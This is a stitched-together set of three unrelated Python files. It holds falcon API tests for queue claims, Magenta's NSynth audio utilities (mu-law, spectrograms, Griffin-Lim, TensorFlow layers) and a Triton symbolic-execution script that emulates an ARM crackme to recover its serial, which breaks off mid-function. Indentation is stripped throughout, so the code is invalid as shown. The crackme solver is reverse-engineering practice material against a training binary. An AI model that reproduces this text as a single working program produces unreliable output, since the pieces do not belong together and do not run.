def test_delete_nonexistent_claim_204s(self):
self.simulate_delete(self.claims_path + '/a')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
def test_patch_nonexistent_claim_404s(self):
patch_data = jsonutils.dumps({'ttl': 100})
self.simulate_patch(self.claims_path + '/a', body=patch_data)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
class TestClaimsFaultyDriver(base.V1BaseFaulty):
config_file = 'wsgi_faulty.conf'
def test_simple(self):
project_id = '480924'
claims_path = self.url_prefix + '/queues/fizbit/claims'
doc = '{"ttl": 100, "grace": 60}'
self.simulate_post(claims_path, project_id, body=doc)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
self.simulate_get(claims_path + '/nichts', project_id)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
self.simulate_patch(claims_path + '/nichts', project_id, body=doc)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
self.simulate_delete(claims_path + '/foo', project_id)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
|
|
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for NSynth."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import os
import librosa
import numpy as np
from six.moves import range # pylint: disable=redefined-builtin
import tensorflow as tf
slim = tf.contrib.slim
def shell_path(path):
return os.path.abspath(os.path.expanduser(os.path.expandvars(path)))
#===============================================================================
# WaveNet Functions
#===============================================================================
def get_module(module_path):
"""Imports module from NSynth directory.
Args:
module_path: Path to module separated by dots.
-> "configs.linear"
Returns:
module: Imported module.
"""
import_path = "magenta.models.nsynth."
module = importlib.import_module(import_path + module_path)
return module
def load_audio(path, sample_length=64000, sr=16000):
"""Loading of a wave file.
Args:
path: Location of a wave file to load.
sample_length: The truncated total length of the final wave file.
sr: Samples per a second.
Returns:
out: The audio in samples from -1.0 to 1.0
"""
audio, _ = librosa.load(path, sr=sr)
audio = audio[:sample_length]
return audio
def mu_law(x, mu=255, int8=False):
"""A TF implementation of Mu-Law encoding.
Args:
x: The audio samples to encode.
mu: The Mu to use in our Mu-Law.
int8: Use int8 encoding.
Returns:
out: The Mu-Law encoded int8 data.
"""
out = tf.sign(x) * tf.log(1 + mu * tf.abs(x)) / np.log(1 + mu)
out = tf.floor(out * 128)
if int8:
out = tf.cast(out, tf.int8)
return out
def inv_mu_law(x, mu=255):
"""A TF implementation of inverse Mu-Law.
Args:
x: The Mu-Law samples to decode.
mu: The Mu we used to encode these samples.
Returns:
out: The decoded data.
"""
x = tf.cast(x, tf.float32)
out = (x + 0.5) * 2. / (mu + 1)
out = tf.sign(out) / mu * ((1 + mu)**tf.abs(out) - 1)
out = tf.where(tf.equal(x, 0), x, out)
return out
def inv_mu_law_numpy(x, mu=255.0):
"""A numpy implementation of inverse Mu-Law.
Args:
x: The Mu-Law samples to decode.
mu: The Mu we used to encode these samples.
Returns:
out: The decoded data.
"""
x = np.array(x).astype(np.float32)
out = (x + 0.5) * 2. / (mu + 1)
out = np.sign(out) / mu * ((1 + mu)**np.abs(out) - 1)
out = np.where(np.equal(x, 0), x, out)
return out
def trim_for_encoding(wav_data, sample_length, hop_length=512):
"""Make sure audio is a even multiple of hop_size.
Args:
wav_data: 1-D or 2-D array of floats.
sample_length: Max length of audio data.
hop_length: Pooling size of WaveNet autoencoder.
Returns:
wav_data: Trimmed array.
sample_length: Length of trimmed array.
"""
if wav_data.ndim == 1:
# Max sample length is the data length
if sample_length > wav_data.size:
sample_length = wav_data.size
# Multiple of hop_length
sample_length = (sample_length // hop_length) * hop_length
# Trim
wav_data = wav_data[:sample_length]
# Assume all examples are the same length
elif wav_data.ndim == 2:
# Max sample length is the data length
if sample_length > wav_data[0].size:
sample_length = wav_data[0].size
# Multiple of hop_length
sample_length = (sample_length // hop_length) * hop_length
# Trim
wav_data = wav_data[:, :sample_length]
return wav_data, sample_length
#===============================================================================
# Baseline Functions
#===============================================================================
#---------------------------------------------------
# Pre/Post-processing
#---------------------------------------------------
def get_optimizer(learning_rate, hparams):
"""Get the tf.train.Optimizer for this optimizer string.
Args:
learning_rate: The learning_rate tensor.
hparams: TF.HParams object with the optimizer and momentum values.
Returns:
optimizer: The tf.train.Optimizer based on the optimizer string.
"""
return {
"rmsprop":
tf.RMSPropOptimizer(
learning_rate,
decay=0.95,
momentum=hparams.momentum,
epsilon=1e-4),
"adam":
tf.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-8),
"adagrad":
tf.AdagradOptimizer(learning_rate, initial_accumulator_value=1.0),
"mom":
tf.MomentumOptimizer(learning_rate, momentum=hparams.momentum),
"sgd":
tf.GradientDescentOptimizer(learning_rate)
}.get(hparams.optimizer)
def specgram(audio,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False):
"""Spectrogram using librosa.
Args:
audio: 1-D array of float32 sound samples.
n_fft: Size of the FFT.
hop_length: Stride of FFT. Defaults to n_fft/2.
mask: Mask the phase derivative by the magnitude.
log_mag: Use the logamplitude.
re_im: Output Real and Imag. instead of logMag and dPhase.
dphase: Use derivative of phase instead of phase.
mag_only: Don't return phase.
Returns:
specgram: [n_fft/2 + 1, audio.size / hop_length, 2]. The first channel is
the logamplitude and the second channel is the derivative of phase.
"""
if not hop_length:
hop_length = int(n_fft / 2.)
fft_config = dict(
n_fft=n_fft, win_length=n_fft, hop_length=hop_length, center=True)
spec = librosa.stft(audio, **fft_config)
if re_im:
re = spec.real[:, :, np.newaxis]
im = spec.imag[:, :, np.newaxis]
spec_real = np.concatenate((re, im), axis=2)
else:
mag, phase = librosa.core.magphase(spec)
phase_angle = np.angle(phase)
# Magnitudes, scaled 0-1
if log_mag:
mag = (librosa.power_to_db(
mag**2, amin=1e-13, top_db=120., ref=np.max) / 120.) + 1
else:
mag /= mag.max()
if dphase:
# Derivative of phase
phase_unwrapped = np.unwrap(phase_angle)
p = phase_unwrapped[:, 1:] - phase_unwrapped[:, :-1]
p = np.concatenate([phase_unwrapped[:, 0:1], p], axis=1) / np.pi
else:
# Normal phase
p = phase_angle / np.pi
# Mask the phase
if log_mag and mask:
p = mag * p
# Return Mag and Phase
p = p.astype(np.float32)[:, :, np.newaxis]
mag = mag.astype(np.float32)[:, :, np.newaxis]
if mag_only:
spec_real = mag[:, :, np.newaxis]
else:
spec_real = np.concatenate((mag, p), axis=2)
return spec_real
def inv_magphase(mag, phase_angle):
phase = np.cos(phase_angle) + 1.j * np.sin(phase_angle)
return mag * phase
def griffin_lim(mag, phase_angle, n_fft, hop, num_iters):
"""Iterative algorithm for phase retrieval from a magnitude spectrogram.
Args:
mag: Magnitude spectrogram.
phase_angle: Initial condition for phase.
n_fft: Size of the FFT.
hop: Stride of FFT. Defaults to n_fft/2.
num_iters: Griffin-Lim iterations to perform.
Returns:
audio: 1-D array of float32 sound samples.
"""
fft_config = dict(n_fft=n_fft, win_length=n_fft, hop_length=hop, center=True)
ifft_config = dict(win_length=n_fft, hop_length=hop, center=True)
complex_specgram = inv_magphase(mag, phase_angle)
for i in range(num_iters):
audio = librosa.istft(complex_specgram, **ifft_config)
if i != num_iters - 1:
complex_specgram = librosa.stft(audio, **fft_config)
_, phase = librosa.magphase(complex_specgram)
phase_angle = np.angle(phase)
complex_specgram = inv_magphase(mag, phase_angle)
return audio
def ispecgram(spec,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=True,
num_iters=1000):
"""Inverse Spectrogram using librosa.
Args:
spec: 3-D specgram array [freqs, time, (mag_db, dphase)].
n_fft: Size of the FFT.
hop_length: Stride of FFT. Defaults to n_fft/2.
mask: Reverse the mask of the phase derivative by the magnitude.
log_mag: Use the logamplitude.
re_im: Output Real and Imag. instead of logMag and dPhase.
dphase: Use derivative of phase instead of phase.
mag_only: Specgram contains no phase.
num_iters: Number of griffin-lim iterations for mag_only.
Returns:
audio: 1-D array of sound samples. Peak normalized to 1.
"""
if not hop_length:
hop_length = n_fft // 2
ifft_config = dict(win_length=n_fft, hop_length=hop_length, center=True)
if mag_only:
mag = spec[:, :, 0]
phase_angle = np.pi * np.random.rand(*mag.shape)
elif re_im:
spec_real = spec[:, :, 0] + 1.j * spec[:, :, 1]
else:
mag, p = spec[:, :, 0], spec[:, :, 1]
if mask and log_mag:
p /= (mag + 1e-13 * np.random.randn(*mag.shape))
if dphase:
# Roll up phase
phase_angle = np.cumsum(p * np.pi, axis=1)
else:
phase_angle = p * np.pi
# Magnitudes
if log_mag:
mag = (mag - 1.0) * 120.0
mag = 10**(mag / 20.0)
phase = np.cos(phase_angle) + 1.j * np.sin(phase_angle)
spec_real = mag * phase
if mag_only:
audio = griffin_lim(
mag, phase_angle, n_fft, hop_length, num_iters=num_iters)
else:
audio = librosa.core.istft(spec_real, **ifft_config)
return np.squeeze(audio / audio.max())
def batch_specgram(audio,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False):
"""Computes specgram in a batch."""
assert len(audio.shape) == 2
batch_size = audio.shape[0]
res = []
for b in range(batch_size):
res.append(
specgram(audio[b], n_fft, hop_length, mask, log_mag, re_im, dphase,
mag_only))
return np.array(res)
def batch_ispecgram(spec,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False,
num_iters=1000):
"""Computes inverse specgram in a batch."""
assert len(spec.shape) == 4
batch_size = spec.shape[0]
res = []
for b in range(batch_size):
res.append(
ispecgram(spec[b, :, :, :], n_fft, hop_length, mask, log_mag, re_im,
dphase, mag_only, num_iters))
return np.array(res)
def tf_specgram(audio,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False):
"""Specgram tensorflow op (uses pyfunc)."""
return tf.py_func(batch_specgram, [
audio, n_fft, hop_length, mask, log_mag, re_im, dphase, mag_only
], tf.float32)
def tf_ispecgram(spec,
n_fft=512,
hop_length=None,
mask=True,
pad=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False,
num_iters=1000):
"""Inverted Specgram tensorflow op (uses pyfunc)."""
dims = spec.get_shape().as_list()
# Add back in nyquist frequency
if pad:
x = tf.concat([spec, tf.zeros([dims[0], 1, dims[2], dims[3]])], 1)
else:
x = spec
audio = tf.py_func(batch_ispecgram, [
x, n_fft, hop_length, mask, log_mag, re_im, dphase, mag_only, num_iters
], tf.float32)
return audio
#---------------------------------------------------
# Summaries
#---------------------------------------------------
def form_image_grid(input_tensor, grid_shape, image_shape, num_channels):
"""Arrange a minibatch of images into a grid to form a single image.
Args:
input_tensor: Tensor. Minibatch of images to format, either 4D
([batch size, height, width, num_channels]) or flattened
([batch size, height * width * num_channels]).
grid_shape: Sequence of int. The shape of the image grid,
formatted as [grid_height, grid_width].
image_shape: Sequence of int. The shape of a single image,
formatted as [image_height, image_width].
num_channels: int. The number of channels in an image.
Returns:
Tensor representing a single image in which the input images have been
arranged into a grid.
Raises:
ValueError: The grid shape and minibatch size don't match, or the image
shape and number of channels are incompatible with the input tensor.
"""
if grid_shape[0] * grid_shape[1] != int(input_tensor.get_shape()[0]):
raise ValueError("Grid shape incompatible with minibatch size.")
if len(input_tensor.get_shape()) == 2:
num_features = image_shape[0] * image_shape[1] * num_channels
if int(input_tensor.get_shape()[1]) != num_features:
raise ValueError("Image shape and number of channels incompatible with "
"input tensor.")
elif len(input_tensor.get_shape()) == 4:
if (int(input_tensor.get_shape()[1]) != image_shape[0] or
int(input_tensor.get_shape()[2]) != image_shape[1] or
int(input_tensor.get_shape()[3]) != num_channels):
raise ValueError("Image shape and number of channels incompatible with "
"input tensor.")
else:
raise ValueError("Unrecognized input tensor format.")
height, width = grid_shape[0] * image_shape[0], grid_shape[1] * image_shape[1]
input_tensor = tf.reshape(input_tensor,
grid_shape + image_shape + [num_channels])
input_tensor = tf.transpose(input_tensor, [0, 1, 3, 2, 4])
input_tensor = tf.reshape(
input_tensor, [grid_shape[0], width, image_shape[0], num_channels])
input_tensor = tf.transpose(input_tensor, [0, 2, 1, 3])
input_tensor = tf.reshape(input_tensor, [1, height, width, num_channels])
return input_tensor
def specgram_summaries(spec,
name,
hparams,
rows=4,
columns=4,
image=True,
phase=True,
audio=True):
"""Post summaries of a specgram (Image and Audio).
For image summaries, creates a rows x columns composite image from the batch.
Also can create audio summaries for raw audio, but hparams.raw_audio must be
True.
Args:
spec: Batch of spectrograms.
name: String prepended to summaries.
hparams: Hyperparamenters.
rows: Int, number of rows in image.
columns: Int, number of columns in image.
image: Bool, create image summary.
phase: Bool, create image summary from second channel in the batch.
audio: Bool, create audio summaries for each spectrogram in the batch.
"""
batch_size, n_freq, n_time, unused_channels = spec.get_shape().as_list()
# Must divide minibatch evenly
b = min(batch_size, rows * columns)
if hparams.raw_audio:
spec = tf.squeeze(spec)
spec /= tf.expand_dims(tf.reduce_max(spec, axis=1), axis=1)
tf.summary.audio(
name, tf.squeeze(spec), hparams.samples_per_second, max_outputs=b)
else:
if image:
if b % columns != 0:
rows = np.floor(np.sqrt(b))
columns = rows
else:
rows = b / columns
tf.summary.image("Mag/%s" % name,
form_image_grid(spec[:b, :, :, :1], [rows, columns],
[n_freq, n_time], 1))
if phase:
tf.summary.image("Phase/%s" % name,
form_image_grid(spec[:b, :, :, 1:], [rows, columns],
[n_freq, n_time], 1))
if audio:
tf.summary.audio(
name,
tf_ispecgram(
spec,
n_fft=hparams.n_fft,
hop_length=hparams.hop_length,
mask=hparams.mask,
log_mag=hparams.log_mag,
pad=hparams.pad,
re_im=hparams.re_im,
dphase=hparams.dphase,
mag_only=hparams.mag_only),
hparams.samples_per_second,
max_outputs=b)
def calculate_softmax_and_summaries(logits, one_hot_labels, name):
"""Calculate the softmax cross entropy loss and associated summaries.
Args:
logits: Tensor of logits, first dimension is batch size.
one_hot_labels: Tensor of one hot encoded categorical labels. First
dimension is batch size.
name: Name to use as prefix for summaries.
Returns:
loss: Dimensionless tensor representing the mean negative
log-probability of the true class.
"""
loss = tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=one_hot_labels)
loss = tf.reduce_mean(loss)
softmax_summaries(loss, logits, one_hot_labels, name)
return loss
def calculate_sparse_softmax_and_summaries(logits, labels, name):
"""Calculate the softmax cross entropy loss and associated summaries.
Args:
logits: Tensor of logits, first dimension is batch size.
labels: Tensor of categorical labels [ints]. First
dimension is batch size.
name: Name to use as prefix for summaries.
Returns:
loss: Dimensionless tensor representing the mean negative
log-probability of the true class.
"""
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=labels)
loss = tf.reduce_mean(loss)
softmax_summaries(loss, logits, labels, name)
return loss
def softmax_summaries(loss, logits, one_hot_labels, name="softmax"):
"""Create the softmax summaries for this cross entropy loss.
Args:
loss: Cross-entropy loss.
logits: The [batch_size, classes] float tensor representing the logits.
one_hot_labels: The float tensor representing actual class ids. If this is
[batch_size, classes], then we take the argmax of it first.
name: Prepended to summary scope.
"""
tf.summary.scalar(name + "_loss", loss)
one_hot_labels = tf.cond(
tf.equal(tf.rank(one_hot_labels),
2), lambda: tf.to_int32(tf.argmax(one_hot_labels, 1)),
lambda: tf.to_int32(one_hot_labels))
in_top_1 = tf.nn.in_top_k(logits, one_hot_labels, 1)
tf.summary.scalar(name + "_precision@1",
tf.reduce_mean(tf.to_float(in_top_1)))
in_top_5 = tf.nn.in_top_k(logits, one_hot_labels, 5)
tf.summary.scalar(name + "_precision@5",
tf.reduce_mean(tf.to_float(in_top_5)))
def calculate_l2_and_summaries(predicted_vectors, true_vectors, name):
"""Calculate L2 loss and associated summaries.
Args:
predicted_vectors: Tensor of predictions, first dimension is batch size.
true_vectors: Tensor of labels, first dimension is batch size.
name: Name to use as prefix for summaries.
Returns:
loss: Dimensionless tensor representing the mean euclidean distance
between true and predicted.
"""
loss = tf.reduce_mean((predicted_vectors - true_vectors)**2)
tf.summary.scalar(name + "_loss", loss)
tf.summary.scalar(
name + "_prediction_mean_squared_norm",
tf.reduce_mean(tf.nn.l2_loss(predicted_vectors)))
tf.summary.scalar(
name + "_label_mean_squared_norm",
tf.reduce_mean(tf.nn.l2_loss(true_vectors)))
return loss
def frequency_weighted_cost_mask(peak=10.0, hz_flat=1000, sr=16000, n_fft=512):
"""Calculates a mask to weight lower frequencies higher.
Piecewise linear approximation. Assumes magnitude is in log scale.
Args:
peak: Cost increase at 0 Hz.
hz_flat: Hz at which cost increase is 0.
sr: Sample rate.
n_fft: FFT size.
Returns:
Constant tensor [1, N_freq, 1] of cost weighting.
"""
n = int(n_fft / 2)
cutoff = np.where(
librosa.core.fft_frequencies(sr=sr, n_fft=n_fft) >= hz_flat)[0][0]
mask = np.concatenate([np.linspace(peak, 1.0, cutoff), np.ones(n - cutoff)])
return tf.constant(mask[np.newaxis, :, np.newaxis], dtype=tf.float32)
#---------------------------------------------------
# Neural Nets
#---------------------------------------------------
def pitch_embeddings(batch,
timesteps=1,
n_pitches=128,
dim_embedding=128,
reuse=False):
"""Get a embedding of each pitch note.
Args:
batch: NSynthDataset batch dictionary.
timesteps: Number of timesteps to replicate across.
n_pitches: Number of one-hot embeddings.
dim_embedding: Dimension of linear projection of one-hot encoding.
reuse: Reuse variables.
Returns:
embedding: A tensor of shape [batch_size, 1, timesteps, dim_embedding].
"""
batch_size = batch["pitch"].get_shape().as_list()[0]
with tf.variable_scope("PitchEmbedding", reuse=reuse):
w = tf.get_variable(
name="embedding_weights",
shape=[n_pitches, dim_embedding],
initializer=tf.random_normal_initializer())
one_hot_pitch = tf.reshape(batch["pitch"], [batch_size])
one_hot_pitch = tf.one_hot(one_hot_pitch, depth=n_pitches)
embedding = tf.matmul(one_hot_pitch, w)
embedding = tf.reshape(embedding, [batch_size, 1, 1, dim_embedding])
if timesteps > 1:
embedding = tf.tile(embedding, [1, 1, timesteps, 1])
return embedding
def slim_batchnorm_arg_scope(is_training, activation_fn=None):
"""Create a scope for applying BatchNorm in slim.
This scope also applies Glorot initializiation to convolutional weights.
Args:
is_training: Whether this is a training run.
activation_fn: Whether we apply an activation_fn to the convolution result.
Returns:
scope: Use this scope to automatically apply BatchNorm and Xavier Init to
slim.conv2d and slim.fully_connected.
"""
batch_norm_params = {
"is_training": is_training,
"decay": 0.999,
"epsilon": 0.001,
"variables_collections": {
"beta": None,
"gamma": None,
"moving_mean": "moving_vars",
"moving_variance": "moving_vars",
}
}
with slim.arg_scope(
[slim.conv2d, slim.fully_connected, slim.conv2d_transpose],
weights_initializer=slim.initializers.xavier_initializer(),
activation_fn=activation_fn,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params) as scope:
return scope
def conv2d(x,
kernel_size,
stride,
channels,
is_training,
scope="conv2d",
batch_norm=False,
residual=False,
gated=False,
activation_fn=tf.nn.relu,
resize=False,
transpose=False,
stacked_layers=1):
"""2D-Conv with optional batch_norm, gating, residual.
Args:
x: Tensor input [MB, H, W, CH].
kernel_size: List [H, W].
stride: List [H, W].
channels: Int, output channels.
is_training: Whether to collect stats for BatchNorm.
scope: Enclosing scope name.
batch_norm: Apply batch normalization
residual: Residual connections, have stacked_layers >= 2.
gated: Gating ala Wavenet.
activation_fn: Nonlinearity function.
resize: On transposed convolution, do ImageResize instead of conv_transpose.
transpose: Use conv_transpose instead of conv.
stacked_layers: Number of layers before a residual connection.
Returns:
x: Tensor output.
"""
# For residual
x0 = x
# Choose convolution function
conv_fn = slim.conv2d_transpose if transpose else slim.conv2d
# Double output channels for gates
num_outputs = channels * 2 if gated else channels
normalizer_fn = slim.batch_norm if batch_norm else None
with tf.variable_scope(scope + "_Layer"):
# Apply a stack of convolutions Before adding residual
for layer_idx in range(stacked_layers):
with slim.arg_scope(
slim_batchnorm_arg_scope(is_training, activation_fn=None)):
# Use interpolation to upsample instead of conv_transpose
if transpose and resize:
unused_mb, h, w, unused_ch = x.get_shape().as_list()
x = tf.image.resize_images(
x, size=[h * stride[0], w * stride[1]], method=0)
stride_conv = [1, 1]
else:
stride_conv = stride
x = conv_fn(
inputs=x,
stride=stride_conv,
kernel_size=kernel_size,
num_outputs=num_outputs,
normalizer_fn=normalizer_fn,
biases_initializer=tf.zeros_initializer(),
scope=scope)
if gated:
with tf.variable_scope("Gated"):
x1, x2 = x[:, :, :, :channels], x[:, :, :, channels:]
if activation_fn:
x1, x2 = activation_fn(x1), tf.sigmoid(x2)
else:
x2 = tf.sigmoid(x2)
x = x1 * x2
# Apply residual to last layer before the last nonlinearity
if residual and (layer_idx == stacked_layers - 1):
with tf.variable_scope("Residual"):
# Don't upsample residual in time
if stride[0] == 1 and stride[1] == 1:
channels_in = x0.get_shape().as_list()[-1]
# Make n_channels match for residual
if channels != channels_in:
x0 = slim.conv2d(
inputs=x0,
stride=[1, 1],
kernel_size=[1, 1],
num_outputs=channels,
normalizer_fn=None,
activation_fn=None,
biases_initializer=tf.zeros_initializer,
scope=scope + "_residual")
x += x0
else:
x += x0
if activation_fn and not gated:
x = activation_fn(x)
return x
def leaky_relu(leak=0.1):
"""Leaky ReLU activation function.
Args:
leak: float. Slope for the negative part of the leaky ReLU function.
Defaults to 0.1.
Returns:
A lambda computing the leaky ReLU function with the specified slope.
"""
return lambda x: tf.maximum(x, leak * x)
def causal_linear(x, n_inputs, n_outputs, name, filter_length, rate,
batch_size):
"""Applies dilated convolution using queues.
Assumes a filter_length of 3.
Args:
x: The [mb, time, channels] tensor input.
n_inputs: The input number of channels.
n_outputs: The output number of channels.
name: The variable scope to provide to W and biases.
filter_length: The length of the convolution, assumed to be 3.
rate: The rate or dilation
batch_size: Non-symbolic value for batch_size.
Returns:
y: The output of the operation
(init_1, init_2): Initialization operations for the queues
(push_1, push_2): Push operations for the queues
"""
assert filter_length == 3
# create queue
q_1 = tf.FIFOQueue(rate, dtypes=tf.float32, shapes=(batch_size, 1, n_inputs))
q_2 = tf.FIFOQueue(rate, dtypes=tf.float32, shapes=(batch_size, 1, n_inputs))
init_1 = q_1.enqueue_many(tf.zeros((rate, batch_size, 1, n_inputs)))
init_2 = q_2.enqueue_many(tf.zeros((rate, batch_size, 1, n_inputs)))
state_1 = q_1.dequeue()
push_1 = q_1.enqueue(x)
state_2 = q_2.dequeue()
push_2 = q_2.enqueue(state_1)
# get pretrained weights
w = tf.get_variable(
name=name + "/W",
shape=[1, filter_length, n_inputs, n_outputs],
dtype=tf.float32)
b = tf.get_variable(
name=name + "/biases", shape=[n_outputs], dtype=tf.float32)
w_q_2 = tf.slice(w, [0, 0, 0, 0], [-1, 1, -1, -1])
w_q_1 = tf.slice(w, [0, 1, 0, 0], [-1, 1, -1, -1])
w_x = tf.slice(w, [0, 2, 0, 0], [-1, 1, -1, -1])
# perform op w/ cached states
y = tf.nn.bias_add(
tf.matmul(state_2[:, 0, :], w_q_2[0][0]) + tf.matmul(
state_1[:, 0, :], w_q_1[0][0]) + tf.matmul(x[:, 0, :], w_x[0][0]), b)
y = tf.expand_dims(y, 1)
return y, (init_1, init_2), (push_1, push_2)
def linear(x, n_inputs, n_outputs, name):
"""Simple linear layer.
Args:
x: The [mb, time, channels] tensor input.
n_inputs: The input number of channels.
n_outputs: The output number of channels.
name: The variable scope to provide to W and biases.
Returns:
y: The output of the operation.
"""
w = tf.get_variable(
name=name + "/W", shape=[1, 1, n_inputs, n_outputs], dtype=tf.float32)
b = tf.get_variable(
name=name + "/biases", shape=[n_outputs], dtype=tf.float32)
y = tf.nn.bias_add(tf.matmul(x[:, 0, :], w[0][0]), b)
y = tf.expand_dims(y, 1)
return y
|
|
#! /usr/bin/env python3
## -*- coding: utf-8 -*-
from __future__ import print_function
from triton import *
import random
import string
import sys
import lief
import os
DEBUG = True
INPUT = 'arm32'
SERIAL = None
TARGET = os.path.join(os.path.dirname(__file__), 'crackme_hash-arm')
VALID = False
FINISH = False
MAX_INSTRS = 10000
# The debug function
def debug(s):
if DEBUG: print(s)
# Memory mapping
BASE_PLT = 0x10000000
BASE_ARGV = 0x20000000
BASE_STACK = 0x9fffffff
def getMemoryString(ctx, addr):
s = str()
index = 0
while ctx.getConcreteMemoryValue(addr+index):
c = chr(ctx.getConcreteMemoryValue(addr+index))
if c not in string.printable: c = ""
s += c
index += 1
return s
def getFormatString(ctx, addr):
return getMemoryString(ctx, addr) \
.replace("%s", "{}").replace("%d", "{:d}").replace("%#02x", "{:#02x}") \
.replace("%#x", "{:#x}").replace("%x", "{:x}").replace("%02X", "{:02x}") \
.replace("%c", "{:c}").replace("%02x", "{:02x}").replace("%ld", "{:d}") \
.replace("%*s", "").replace("%lX", "{:x}").replace("%08x", "{:08x}") \
.replace("%u", "{:d}").replace("%lu", "{:d}") \
# Simulate the printf() function
def printfHandler(ctx):
debug('[+] printf hooked')
# Get arguments
arg1 = getFormatString(ctx, ctx.getConcreteRegisterValue(ctx.registers.r0))
arg2 = ctx.getConcreteRegisterValue(ctx.registers.r1)
arg3 = ctx.getConcreteRegisterValue(ctx.registers.r2)
arg4 = ctx.getConcreteRegisterValue(ctx.registers.r3)
arg5 = ctx.getConcreteRegisterValue(ctx.registers.r4)
arg6 = ctx.getConcreteRegisterValue(ctx.registers.r5)
nbArgs = arg1.count("{")
args = [arg2, arg3, arg4, arg5, arg6][:nbArgs]
s = arg1.format(*args)
sys.stdout.write(s + "\n")
# Return value
return len(s)
# Simulate the puts() function
def putsHandler(ctx):
debug('[+] puts hooked')
# Get arguments
arg1 = getMemoryString(ctx, ctx.getConcreteRegisterValue(ctx.registers.r0))
sys.stdout.write(arg1 + '\n')
# Return value
return len(arg1) + 1
def abortHandler(ctx):
global FINISH
debug('[+] abort hooked')
# sys.exit(0)
FINISH = True
return
def libcMainHandler(ctx):
debug('[+] __libc_start_main hooked')
# Get main function address.
main_addr = ctx.getConcreteRegisterValue(ctx.registers.r0)
# Setup argc / argv
ctx.concretizeRegister(ctx.registers.r0)
ctx.concretizeRegister(ctx.registers.r1)
argvs = [
bytes(TARGET.encode('utf-8')), # argv[0]
bytes(INPUT.encode('utf-8'))
]
# Define argc / argv
base = BASE_ARGV
addrs = list()
index = 0
for argv in argvs:
addrs.append(base)
ctx.setConcreteMemoryAreaValue(base, argv+b'\x00')
if index == 1:
# Only symbolized argv[1]
for indexCell in range(len(argv)):
var = ctx.symbolizeMemory(MemoryAccess(base+indexCell, CPUSIZE.BYTE))
var.setComment('argv[%d][%d]' %(index, indexCell))
debug('[+] argv[%d] = %s' %(index, argv))
base += len(argv)+1
index += 1
argc = len(argvs)
argv = base
for addr in addrs:
ctx.setConcreteMemoryValue(MemoryAccess(base, CPUSIZE.DWORD), addr)
base += CPUSIZE.DWORD
ctx.setConcreteRegisterValue(ctx.registers.r0, argc)
ctx.setConcreteRegisterValue(ctx.registers.r1, argv)
# Simulate call to main
# debug('[+] Simulating call to main...')
ctx.setConcreteRegisterValue(ctx.registers.sp, ctx.getConcreteRegisterValue(ctx.registers.sp)-CPUSIZE.DWORD)
push_addr = MemoryAccess(ctx.getConcreteRegisterValue(ctx.registers.sp), CPUSIZE.DWORD)
ctx.setConcreteMemoryValue(push_addr, main_addr)
# debug(' Pushing {:x} at {:x}'.format(main_addr, ctx.getConcreteRegisterValue(ctx.registers.sp)))
return None
# Functions to emulate
customRelocation = [
('printf', printfHandler, BASE_PLT + 0 << 2),
('puts', putsHandler, BASE_PLT + 1 << 2),
('__libc_start_main', libcMainHandler, BASE_PLT + 2 << 2),
('abort', abortHandler, BASE_PLT + 4 << 2),
]
def hookingHandler(ctx):
pc = ctx.getConcreteRegisterValue(ctx.registers.pc)
for rel in customRelocation:
if rel[2] == pc:
# Simulate push {lr}
# debug('[+] Simulating "push {lr}"')
ctx.setConcreteRegisterValue(ctx.registers.sp, ctx.getConcreteRegisterValue(ctx.registers.sp)-CPUSIZE.DWORD)
push_addr = MemoryAccess(ctx.getConcreteRegisterValue(ctx.registers.sp), CPUSIZE.DWORD)
ctx.setConcreteMemoryValue(push_addr, ctx.getConcreteRegisterValue(ctx.registers.r14))
# debug(' lr : {:x}'.format(ctx.getConcreteRegisterValue(ctx.registers.r14)))
# Emulate the routine and the return value
ret_value = rel[1](ctx)
if ret_value is not None:
ctx.setConcreteRegisterValue(ctx.registers.r0, ret_value)
# Simulate pop {lr}
# debug('[+] Simulating "pop {pc}"')
pop_addr = MemoryAccess(ctx.getConcreteRegisterValue(ctx.registers.sp), CPUSIZE.DWORD)
pc = ctx.getConcreteMemoryValue(pop_addr)
ctx.setConcreteRegisterValue(ctx.registers.sp, ctx.getConcreteRegisterValue(ctx.registers.sp)+CPUSIZE.DWORD)
# debug(" pc : {:x}".format(pc))
# Update PC
ctx.setConcreteRegisterValue(ctx.registers.pc, pc)
return
# Emulate the binary.
def emulate(ctx, pc):
global SERIAL
global VALID
count = 0
while pc and count < MAX_INSTRS and not FINISH:
# Fetch opcodes
opcodes = ctx.getConcreteMemoryAreaValue(pc, 4)
# Create the Triton instruction
instruction = Instruction()
instruction.setOpcode(opcodes)
instruction.setAddress(pc)
# Process
if ctx.processing(instruction) == False:
opcodes_str = " ".join(["{:02x}".format(ord(b)) for b in instruction.getOpcode()])
debug('[-] Instruction not supported: %s\t%s' %(opcodes_str, str(instruction)))
break
# debug(instruction)
# .text:00010518 LDR R0, =unk_105C0 ; s
# .text:0001051C BL puts
# .text:00010520 B loc_1052C
if pc == 0x1051C:
# We validated the crackme
VALID = True
# .text:0001050C LDR R2, =0xAD6D
# .text:00010510 CMP R3, R2
